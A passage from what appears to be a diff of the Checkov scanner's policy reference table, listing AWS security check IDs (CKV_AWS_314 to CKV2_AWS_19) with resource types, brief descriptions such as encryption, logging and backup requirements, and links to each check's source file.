[RDSClusterCopyTags.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/RDSClusterCopyTags.py) | +| 753 | CKV_AWS_314 | resource | aws_codebuild_project | Ensure CodeBuild project environments have a logging configuration | Terraform | [CodebuildHasLogs.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/CodebuildHasLogs.py) | +| 754 | CKV_AWS_315 | resource | aws_autoscaling_group | Ensure EC2 Auto Scaling groups use EC2 launch templates | Terraform | [AutoScalingLaunchTemplate.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/AutoScalingLaunchTemplate.py) | +| 755 | CKV_AWS_316 | resource | aws_codebuild_project | Ensure CodeBuild project environments do not have privileged mode enabled | Terraform | [CodeBuildPrivilegedMode.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/CodeBuildPrivilegedMode.py) | +| 756 | CKV_AWS_317 | resource | AWS::Elasticsearch::Domain | Ensure Elasticsearch Domain Audit Logging is enabled | Cloudformation | [ElasticsearchDomainAuditLogging.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/ElasticsearchDomainAuditLogging.py) | +| 757 | CKV_AWS_317 | resource | AWS::OpenSearchService::Domain | Ensure Elasticsearch Domain Audit Logging is enabled | Cloudformation | [ElasticsearchDomainAuditLogging.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/ElasticsearchDomainAuditLogging.py) | +| 758 | CKV_AWS_317 | resource | aws_elasticsearch_domain | Ensure Elasticsearch Domain Audit Logging is enabled | Terraform | [ElasticsearchDomainAuditLogging.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ElasticsearchDomainAuditLogging.py) | +| 759 | CKV_AWS_317 | resource | aws_opensearch_domain | Ensure Elasticsearch Domain Audit Logging is enabled | Terraform | [ElasticsearchDomainAuditLogging.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ElasticsearchDomainAuditLogging.py) | +| 760 | CKV_AWS_318 | resource | aws_elasticsearch_domain | Ensure Elasticsearch domains are configured with at least three dedicated master nodes for HA | Terraform | [ElasticsearchDomainHA.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ElasticsearchDomainHA.py) | +| 761 | CKV_AWS_318 | resource | aws_opensearch_domain | Ensure Elasticsearch domains are configured with at least three dedicated master nodes for HA | Terraform | [ElasticsearchDomainHA.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ElasticsearchDomainHA.py) | +| 762 | CKV_AWS_319 | resource | aws_cloudwatch_metric_alarm | Ensure that CloudWatch alarm actions are enabled | Terraform | [CloudWatchAlarmsEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/CloudWatchAlarmsEnabled.py) | +| 763 | CKV_AWS_320 | resource | aws_redshift_cluster | Ensure Redshift clusters do not use the default database name | Terraform | [RedshiftClusterDatabaseName.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/RedshiftClusterDatabaseName.py) | +| 764 | CKV_AWS_321 | resource | aws_redshift_cluster | Ensure Redshift clusters use enhanced VPC routing | Terraform | [RedshiftClusterUseEnhancedVPCRouting.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/RedshiftClusterUseEnhancedVPCRouting.py) | +| 765 | CKV_AWS_322 | resource | aws_elasticache_cluster | Ensure ElastiCache for Redis cache clusters have auto minor version upgrades enabled | Terraform | [ElasticCacheAutomaticMinorUpgrades.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ElasticCacheAutomaticMinorUpgrades.py) | +| 766 | CKV_AWS_323 | resource | aws_elasticache_cluster | Ensure ElastiCache clusters do not use the default subnet group | Terraform | [ElastiCacheHasCustomSubnet.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ElastiCacheHasCustomSubnet.py) | +| 767 | CKV_AWS_324 | resource | aws_rds_cluster | Ensure that RDS Cluster log capture is enabled | Terraform | [RDSClusterLogging.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/RDSClusterLogging.py) | +| 768 | CKV_AWS_325 | resource | aws_rds_cluster | Ensure that RDS Cluster audit logging is enabled for MySQL engine | Terraform | [RDSClusterAuditLogging.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/RDSClusterAuditLogging.py) | +| 769 | CKV_AWS_326 | resource | aws_rds_cluster | Ensure that RDS Aurora Clusters have backtracking enabled | Terraform | [RDSClusterAuroraBacktrack.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/RDSClusterAuroraBacktrack.py) | +| 770 | CKV_AWS_327 | resource | aws_rds_cluster | Ensure RDS Clusters are encrypted using KMS CMKs | Terraform | [RDSClusterEncryptedWithCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/RDSClusterEncryptedWithCMK.py) | +| 771 | CKV_AWS_328 | resource | aws_alb | Ensure that ALB is configured with defensive or strictest desync mitigation mode | Terraform | [ALBDesyncMode.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ALBDesyncMode.py) | +| 772 | CKV_AWS_328 | resource | aws_elb | Ensure that ALB is configured with defensive or strictest desync mitigation mode | Terraform | [ALBDesyncMode.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ALBDesyncMode.py) | +| 773 | CKV_AWS_328 | resource | aws_lb | Ensure that ALB is configured with defensive or strictest desync mitigation mode | Terraform | [ALBDesyncMode.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ALBDesyncMode.py) | +| 774 | CKV_AWS_329 | resource | aws_efs_access_point | EFS access points should enforce a root directory | Terraform | [EFSAccessPointRoot.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/EFSAccessPointRoot.py) | +| 775 | CKV_AWS_330 | resource | aws_efs_access_point | EFS access points should enforce a user identity | Terraform | [EFSAccessUserIdentity.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/EFSAccessUserIdentity.py) | +| 776 | CKV_AWS_331 | resource | aws_ec2_transit_gateway | Ensure Transit Gateways do not automatically accept VPC attachment requests | Terraform | [Ec2TransitGatewayAutoAccept.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/Ec2TransitGatewayAutoAccept.py) | +| 777 | CKV_AWS_332 | resource | aws_ecs_service | Ensure ECS Fargate services run on the latest Fargate platform version | Terraform | [ECSServiceFargateLatest.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ECSServiceFargateLatest.py) | +| 778 | CKV_AWS_333 | resource | aws_ecs_service | Ensure ECS services do not have public IP addresses assigned to them automatically | Terraform | [ECSServicePublicIP.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ECSServicePublicIP.py) | +| 779 | CKV_AWS_334 | resource | aws_ecs_task_definition | Ensure ECS containers should run as non-privileged | Terraform | [ECSContainerPrivilege.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ECSContainerPrivilege.py) | +| 780 | CKV_AWS_335 | resource | aws_ecs_task_definition | Ensure ECS task definitions should not share the host's process namespace | Terraform | [ECSContainerHostProcess.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ECSContainerHostProcess.py) | +| 781 | CKV_AWS_336 | resource | aws_ecs_task_definition | Ensure ECS containers are limited to read-only access to root filesystems | Terraform | [ECSContainerReadOnlyRoot.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ECSContainerReadOnlyRoot.py) | +| 782 | CKV_AWS_337 | resource | aws_ssm_parameter | Ensure SSM parameters are using KMS CMK | Terraform | [SSMParameterUsesCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/SSMParameterUsesCMK.py) | +| 783 | CKV_AWS_338 | resource | aws_cloudwatch_log_group | Ensure CloudWatch log groups retains logs for at least 1 year | Terraform | [CloudWatchLogGroupRetentionYear.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/CloudWatchLogGroupRetentionYear.py) | +| 784 | CKV_AWS_339 | resource | aws_eks_cluster | Ensure EKS clusters run on a supported Kubernetes version | Terraform | [EKSPlatformVersion.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/EKSPlatformVersion.py) | +| 785 | CKV_AWS_340 | resource | aws_elastic_beanstalk_environment | Ensure Elastic Beanstalk managed platform updates are enabled | Terraform | [ElasticBeanstalkUseManagedUpdates.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ElasticBeanstalkUseManagedUpdates.py) | +| 786 | CKV_AWS_341 | resource | aws_launch_configuration | Ensure Launch template should not have a metadata response hop limit greater than 1 | Terraform | [LaunchTemplateMetadataHop.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/LaunchTemplateMetadataHop.py) | +| 787 | CKV_AWS_341 | resource | aws_launch_template | Ensure Launch template should not have a metadata response hop limit greater than 1 | Terraform | [LaunchTemplateMetadataHop.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/LaunchTemplateMetadataHop.py) | +| 788 | CKV_AWS_342 | resource | aws_waf_rule_group | Ensure WAF rule has any actions | Terraform | [WAFRuleHasAnyActions.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/WAFRuleHasAnyActions.py) | +| 789 | CKV_AWS_342 | resource | aws_waf_web_acl | Ensure WAF rule has any actions | Terraform | [WAFRuleHasAnyActions.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/WAFRuleHasAnyActions.py) | +| 790 | CKV_AWS_342 | resource | aws_wafregional_rule_group | Ensure WAF rule has any actions | Terraform | [WAFRuleHasAnyActions.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/WAFRuleHasAnyActions.py) | +| 791 | CKV_AWS_342 | resource | aws_wafregional_web_acl | Ensure WAF rule has any actions | Terraform | [WAFRuleHasAnyActions.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/WAFRuleHasAnyActions.py) | +| 792 | CKV_AWS_342 | resource | aws_wafv2_rule_group | Ensure WAF rule has any actions | Terraform | [WAFRuleHasAnyActions.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/WAFRuleHasAnyActions.py) | +| 793 | CKV_AWS_342 | resource | aws_wafv2_web_acl | Ensure WAF rule has any actions | Terraform | [WAFRuleHasAnyActions.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/WAFRuleHasAnyActions.py) | +| 794 | CKV_AWS_343 | resource | aws_redshift_cluster | Ensure Amazon Redshift clusters should have automatic snapshots enabled | Terraform | [RedshiftClusterAutoSnap.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/RedshiftClusterAutoSnap.py) | +| 795 | CKV_AWS_344 | resource | aws_networkfirewall_firewall | Ensure that Network firewalls have deletion protection enabled | Terraform | [NetworkFirewallDeletionProtection.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/NetworkFirewallDeletionProtection.py) | +| 796 | CKV_AWS_345 | resource | aws_networkfirewall_firewall | Ensure that Network firewall encryption is via a CMK | Terraform | [NetworkFirewallUsesCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/NetworkFirewallUsesCMK.py) | +| 797 | CKV_AWS_345 | resource | aws_networkfirewall_rule_group | Ensure that Network firewall encryption is via a CMK | Terraform | [NetworkFirewallUsesCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/NetworkFirewallUsesCMK.py) | +| 798 | CKV_AWS_346 | resource | aws_networkfirewall_firewall_policy | Ensure Network Firewall Policy defines an encryption configuration that uses a customer managed Key (CMK) | Terraform | [NetworkFirewallPolicyDefinesCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/NetworkFirewallPolicyDefinesCMK.py) | +| 799 | CKV_AWS_347 | resource | aws_neptune_cluster | Ensure Neptune is encrypted by KMS using a customer managed Key (CMK) | Terraform | [NeptuneClusterEncryptedWithCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/NeptuneClusterEncryptedWithCMK.py) | +| 800 | CKV_AWS_348 | resource | aws_iam_access_key | Ensure IAM root user doesnt have Access keys | Terraform | [IAMUserRootAccessKeys.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/IAMUserRootAccessKeys.py) | +| 801 | CKV_AWS_349 | resource | aws_emr_security_configuration | Ensure EMR Cluster security configuration encrypts local disks | Terraform | [EMRClusterConfEncryptsLocalDisk.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/EMRClusterConfEncryptsLocalDisk.py) | +| 802 | CKV_AWS_350 | resource | aws_emr_security_configuration | Ensure EMR Cluster security configuration encrypts EBS disks | Terraform | [EMRClusterConfEncryptsEBS.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/EMRClusterConfEncryptsEBS.py) | +| 803 | CKV_AWS_351 | resource | aws_emr_security_configuration | Ensure EMR Cluster security configuration encrypts InTransit | Terraform | [EMRClusterConfEncryptsInTransit.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/EMRClusterConfEncryptsInTransit.py) | +| 804 | CKV_AWS_352 | resource | aws_network_acl_rule | Ensure NACL ingress does not allow all Ports | Terraform | [NetworkACLUnrestricted.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/NetworkACLUnrestricted.py) | +| 805 | CKV_AWS_353 | resource | aws_db_instance | Ensure that RDS instances have performance insights enabled | Terraform | [RDSInstancePerformanceInsights.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/RDSInstancePerformanceInsights.py) | +| 806 | CKV_AWS_353 | resource | aws_rds_cluster_instance | Ensure that RDS instances have performance insights enabled | Terraform | [RDSInstancePerformanceInsights.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/RDSInstancePerformanceInsights.py) | +| 807 | CKV_AWS_354 | resource | aws_db_instance | Ensure RDS Performance Insights are encrypted using KMS CMKs | Terraform | [RDSInstancePerfInsightsEncryptionWithCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/RDSInstancePerfInsightsEncryptionWithCMK.py) | +| 808 | CKV_AWS_354 | resource | aws_rds_cluster_instance | Ensure RDS Performance Insights are encrypted using KMS CMKs | Terraform | [RDSInstancePerfInsightsEncryptionWithCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/RDSInstancePerfInsightsEncryptionWithCMK.py) | +| 809 | CKV_AWS_355 | resource | aws_iam_group_policy | Ensure no IAM policies documents allow "*" as a statement's resource for restrictable actions | Terraform | [IAMStarResourcePolicyDocument.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/IAMStarResourcePolicyDocument.py) | +| 810 | CKV_AWS_355 | resource | aws_iam_policy | Ensure no IAM policies documents allow "*" as a statement's resource for restrictable actions | Terraform | [IAMStarResourcePolicyDocument.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/IAMStarResourcePolicyDocument.py) | +| 811 | CKV_AWS_355 | resource | aws_iam_role_policy | Ensure no IAM policies documents allow "*" as a statement's resource for restrictable actions | Terraform | [IAMStarResourcePolicyDocument.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/IAMStarResourcePolicyDocument.py) | +| 812 | CKV_AWS_355 | resource | aws_iam_user_policy | Ensure no IAM policies documents allow "*" as a statement's resource for restrictable actions | Terraform | [IAMStarResourcePolicyDocument.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/IAMStarResourcePolicyDocument.py) | +| 813 | CKV_AWS_355 | resource | aws_ssoadmin_permission_set_inline_policy | Ensure no IAM policies documents allow "*" as a statement's resource for restrictable actions | Terraform | [IAMStarResourcePolicyDocument.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/IAMStarResourcePolicyDocument.py) | +| 814 | CKV_AWS_356 | data | aws_iam_policy_document | Ensure no IAM policies documents allow "*" as a statement's resource for restrictable actions | Terraform | [ResourcePolicyDocument.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/data/aws/ResourcePolicyDocument.py) | +| 815 | CKV_AWS_357 | resource | aws_transfer_server | Ensure Transfer Server allows only secure protocols | Terraform | [TransferServerAllowsOnlySecureProtocols.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/TransferServerAllowsOnlySecureProtocols.py) | +| 816 | CKV_AWS_358 | data | aws_iam_policy_document | Ensure GitHub Actions OIDC trust policies only allows actions from a specific known organization | Terraform | [GithubActionsOIDCTrustPolicy.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/data/aws/GithubActionsOIDCTrustPolicy.py) | +| 817 | CKV_AWS_359 | resource | aws_neptune_cluster | Neptune DB clusters should have IAM database authentication enabled | Terraform | [NeptuneDBClustersIAMDatabaseAuthenticationEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/NeptuneDBClustersIAMDatabaseAuthenticationEnabled.py) | +| 818 | CKV_AWS_360 | resource | AWS::DocDB::DBCluster | Ensure DocumentDB has an adequate backup retention period | Cloudformation | [DocDBBackupRetention.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/DocDBBackupRetention.py) | +| 819 | CKV_AWS_360 | resource | aws_docdb_cluster | Ensure DocumentDB has an adequate backup retention period | Terraform | [DocDBBackupRetention.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/DocDBBackupRetention.py) | +| 820 | CKV_AWS_361 | resource | AWS::Neptune::DBCluster | Ensure that Neptune DB cluster has automated backups enabled with adequate retention | Cloudformation | [NeptuneClusterBackupRetention.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/NeptuneClusterBackupRetention.py) | +| 821 | CKV_AWS_361 | resource | aws_neptune_cluster | Ensure that Neptune DB cluster has automated backups enabled with adequate retention | Terraform | [NeptuneClusterBackupRetention.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/NeptuneClusterBackupRetention.py) | +| 822 | CKV_AWS_362 | resource | aws_neptune_cluster | Neptune DB clusters should be configured to copy tags to snapshots | Terraform | [NeptuneDBClustersCopyTagsToSnapshots.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/NeptuneDBClustersCopyTagsToSnapshots.py) | +| 823 | CKV_AWS_363 | resource | AWS::Lambda::Function | Ensure Lambda Runtime is not deprecated | Cloudformation | [DeprecatedLambdaRuntime.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/DeprecatedLambdaRuntime.py) | +| 824 | CKV_AWS_363 | resource | AWS::Serverless::Function | Ensure Lambda Runtime is not deprecated | Cloudformation | [DeprecatedLambdaRuntime.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/DeprecatedLambdaRuntime.py) | +| 825 | CKV_AWS_363 | resource | aws_lambda_function | Ensure Lambda Runtime is not deprecated | Terraform | [DeprecatedLambdaRuntime.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/DeprecatedLambdaRuntime.py) | +| 826 | CKV_AWS_364 | resource | AWS::Lambda::Permission | Ensure that AWS Lambda function permissions delegated to AWS services are limited by SourceArn or SourceAccount | Cloudformation | [LambdaServicePermission.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/LambdaServicePermission.py) | +| 827 | CKV_AWS_364 | resource | aws_lambda_permission | Ensure that AWS Lambda function permissions delegated to AWS services are limited by SourceArn or SourceAccount | Terraform | [LambdaServicePermission.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/LambdaServicePermission.py) | +| 828 | CKV_AWS_365 | resource | aws_ses_configuration_set | Ensure SES Configuration Set enforces TLS usage | Terraform | [SesConfigurationSetDefinesTLS.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/SesConfigurationSetDefinesTLS.py) | +| 829 | CKV_AWS_366 | resource | AWS::Cognito::IdentityPool | Ensure AWS Cognito identity pool does not allow unauthenticated guest access | Cloudformation | [CognitoUnauthenticatedIdentities.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/CognitoUnauthenticatedIdentities.py) | +| 830 | CKV_AWS_366 | resource | aws_cognito_identity_pool | Ensure AWS Cognito identity pool does not allow unauthenticated guest access | Terraform | [CognitoUnauthenticatedIdentities.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/CognitoUnauthenticatedIdentities.py) | +| 831 | CKV2_AWS_1 | resource | aws_network_acl | Ensure that all NACL are attached to subnets | Terraform | [SubnetHasACL.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/SubnetHasACL.yaml) | +| 832 | CKV2_AWS_1 | resource | aws_subnet | Ensure that all NACL are attached to subnets | Terraform | [SubnetHasACL.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/SubnetHasACL.yaml) | +| 833 | CKV2_AWS_2 | resource | aws_ebs_volume | Ensure that only encrypted EBS volumes are attached to EC2 instances | Terraform | [EncryptedEBSVolumeOnlyConnectedToEC2s.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/EncryptedEBSVolumeOnlyConnectedToEC2s.yaml) | +| 834 | CKV2_AWS_2 | resource | aws_volume_attachment | Ensure that only encrypted EBS volumes are attached to EC2 instances | Terraform | [EncryptedEBSVolumeOnlyConnectedToEC2s.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/EncryptedEBSVolumeOnlyConnectedToEC2s.yaml) | +| 835 | CKV2_AWS_3 | resource | aws_guardduty_detector | Ensure GuardDuty is enabled to specific org/region | Terraform | [GuardDutyIsEnabled.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/GuardDutyIsEnabled.yaml) | +| 836 | CKV2_AWS_3 | resource | aws_guardduty_organization_configuration | Ensure GuardDuty is enabled to specific org/region | Terraform | [GuardDutyIsEnabled.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/GuardDutyIsEnabled.yaml) | +| 837 | CKV2_AWS_4 | resource | aws_api_gateway_method_settings | Ensure API Gateway stage have logging level defined as appropriate | Terraform | [APIGWLoggingLevelsDefinedProperly.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/APIGWLoggingLevelsDefinedProperly.yaml) | +| 838 | CKV2_AWS_4 | resource | aws_api_gateway_stage | Ensure API Gateway stage have logging level defined as appropriate | Terraform | [APIGWLoggingLevelsDefinedProperly.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/APIGWLoggingLevelsDefinedProperly.yaml) | +| 839 | CKV2_AWS_5 | resource | aws_security_group | Ensure that Security Groups are attached to another resource | Terraform | [SGAttachedToResource.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/SGAttachedToResource.yaml) | +| 840 | CKV2_AWS_6 | resource | aws_s3_bucket | Ensure that S3 bucket has a Public Access block | Terraform | [S3BucketHasPublicAccessBlock.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/S3BucketHasPublicAccessBlock.yaml) | +| 841 | CKV2_AWS_6 | resource | aws_s3_bucket_public_access_block | Ensure that S3 bucket has a Public Access block | Terraform | [S3BucketHasPublicAccessBlock.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/S3BucketHasPublicAccessBlock.yaml) | +| 842 | CKV2_AWS_7 | resource | aws_emr_cluster | Ensure that Amazon EMR clusters' security groups are not open to the world | Terraform | [AMRClustersNotOpenToInternet.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/AMRClustersNotOpenToInternet.yaml) | +| 843 | CKV2_AWS_7 | resource | aws_security_group | Ensure that Amazon EMR clusters' security groups are not open to the world | Terraform | [AMRClustersNotOpenToInternet.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/AMRClustersNotOpenToInternet.yaml) | +| 844 | CKV2_AWS_8 | resource | aws_rds_cluster | Ensure that RDS clusters has backup plan of AWS Backup | Terraform | [RDSClusterHasBackupPlan.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/RDSClusterHasBackupPlan.yaml) | +| 845 | CKV2_AWS_9 | resource | aws_backup_selection | Ensure that EBS are added in the backup plans of AWS Backup | Terraform | [EBSAddedBackup.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/EBSAddedBackup.yaml) | +| 846 | CKV2_AWS_10 | resource | aws_cloudtrail | Ensure CloudTrail trails are integrated with CloudWatch Logs | Terraform | [CloudtrailHasCloudwatch.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CloudtrailHasCloudwatch.yaml) | +| 847 | CKV2_AWS_11 | resource | aws_vpc | Ensure VPC flow logging is enabled in all VPCs | Terraform | [VPCHasFlowLog.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/VPCHasFlowLog.yaml) | +| 848 | CKV2_AWS_12 | resource | aws_default_security_group | Ensure the default security group of every VPC restricts all traffic | Terraform | [VPCHasRestrictedSG.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/VPCHasRestrictedSG.yaml) | +| 849 | CKV2_AWS_12 | resource | aws_vpc | Ensure the default security group of every VPC restricts all traffic | Terraform | [VPCHasRestrictedSG.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/VPCHasRestrictedSG.yaml) | +| 850 | CKV2_AWS_14 | resource | aws_iam_group | Ensure that IAM groups includes at least one IAM user | Terraform | [IAMGroupHasAtLeastOneUser.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/IAMGroupHasAtLeastOneUser.yaml) | +| 851 | CKV2_AWS_14 | resource | aws_iam_group_membership | Ensure that IAM groups includes at least one IAM user | Terraform | [IAMGroupHasAtLeastOneUser.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/IAMGroupHasAtLeastOneUser.yaml) | +| 852 | CKV2_AWS_15 | resource | aws_autoscaling_group | Ensure that auto Scaling groups that are associated with a load balancer are using Elastic Load Balancing health checks. | Terraform | [AutoScallingEnabledELB.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/AutoScallingEnabledELB.yaml) | +| 853 | CKV2_AWS_15 | resource | aws_elb | Ensure that auto Scaling groups that are associated with a load balancer are using Elastic Load Balancing health checks. | Terraform | [AutoScallingEnabledELB.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/AutoScallingEnabledELB.yaml) | +| 854 | CKV2_AWS_15 | resource | aws_lb_target_group | Ensure that auto Scaling groups that are associated with a load balancer are using Elastic Load Balancing health checks. | Terraform | [AutoScallingEnabledELB.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/AutoScallingEnabledELB.yaml) | +| 855 | CKV2_AWS_16 | resource | aws_appautoscaling_target | Ensure that Auto Scaling is enabled on your DynamoDB tables | Terraform | [AutoScalingEnableOnDynamoDBTables.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/AutoScalingEnableOnDynamoDBTables.yaml) | +| 856 | CKV2_AWS_16 | resource | aws_dynamodb_table | Ensure that Auto Scaling is enabled on your DynamoDB tables | Terraform | [AutoScalingEnableOnDynamoDBTables.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/AutoScalingEnableOnDynamoDBTables.yaml) | +| 857 | CKV2_AWS_18 | resource | aws_backup_selection | Ensure that Elastic File System (Amazon EFS) file systems are added in the backup plans of AWS Backup | Terraform | [EFSAddedBackup.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/EFSAddedBackup.yaml) | +| 858 | CKV2_AWS_19 | resource | aws_eip | Ensure that all EIP addresses allocated to a VPC are attached to EC2 instances | Terraform | [EIPAllocatedToVPCAttachedEC2.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/EIPAllocatedToVPCAttachedEC2.yaml) | +| 859 | CKV2_AWS_19 | resource | aws_eip_association | Ensure that all EIP addresses allocated to a VPC are attached to EC2 instances | Terraform | 